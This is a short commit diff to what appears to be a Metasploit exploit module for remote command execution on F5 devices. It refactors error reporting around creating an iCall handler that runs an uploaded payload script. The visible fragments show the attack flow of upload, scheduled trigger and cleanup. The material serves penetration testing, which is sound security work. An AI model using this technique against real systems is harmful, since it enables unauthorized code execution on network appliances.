Better handling of handler creation output

jhart-r7 · jhart-r7 · commit ae3d65f649cb · 2015-11-18T15:31:32.000-08:00
diff --git a/modules/exploits/linux/http/f5_icall_cmd.rb b/modules/exploits/linux/http/f5_icall_cmd.rb
@@ -152,6 +152,7 @@ def script_exists?(script_name)
   end
 
   def create_handler(handler_name, script_name)
+    print_status("Creating trigger #{handler_name}")
     handler_xml = build_xml do |xml|
       xml['per'].create(SOAPENV_ENCODINGSTYLE) do
         xml.handlers(STRING_ATTRS) do
@@ -168,12 +169,22 @@ def create_handler(handler_name, script_name)
           # start/end time it will run once, more or less immediately, and
           # again 24h from now, but by that point hopefully we will have
           # cleaned up and the handler/script/etc are gone
-          xml.item 60*60*24
+          xml.item 60 * 60 * 24
         end
       end
     end
     res = send_soap_request(handler_xml)
-    res && res.code == 200 && res.body =~ Regexp.new("iCall/PeriodicHandler")
+    if res
+      if res.code == 200 && res.body =~ Regexp.new("iCall/PeriodicHandler")
+        true
+      else
+        print_error("Trigger creation failed -- HTTP/#{res.proto} #{res.code} #{res.message}")
+        false
+      end
+    else
+      print_error("No response to trigger creation")
+      false
+    end
   end
 
   def delete_handler(handler_name)
@@ -229,7 +240,7 @@ def exploit
 
     script_name = "script-#{Rex::Text.rand_text_alphanumeric(16)}"
     print_status("Uploading payload script #{script_name}")
-    unless create_script_res = create_script(script_name, cmd)
+    unless (create_script_res = create_script(script_name, cmd))
       print_error("No response when uploading payload script")
       return false
     end
@@ -246,9 +257,7 @@ def exploit
 
     # phase 2: create iCall Handler, that will actually run the previously created script
     handler_name = "handler-#{Rex::Text.rand_text_alphanumeric(16)}"
-    print_status("Creating trigger #{handler_name}")
     unless create_handler(handler_name, script_name)
-      print_error('Payload script uploaded but trigger creation failed')
       delete_script(script_name)
       return false
     end
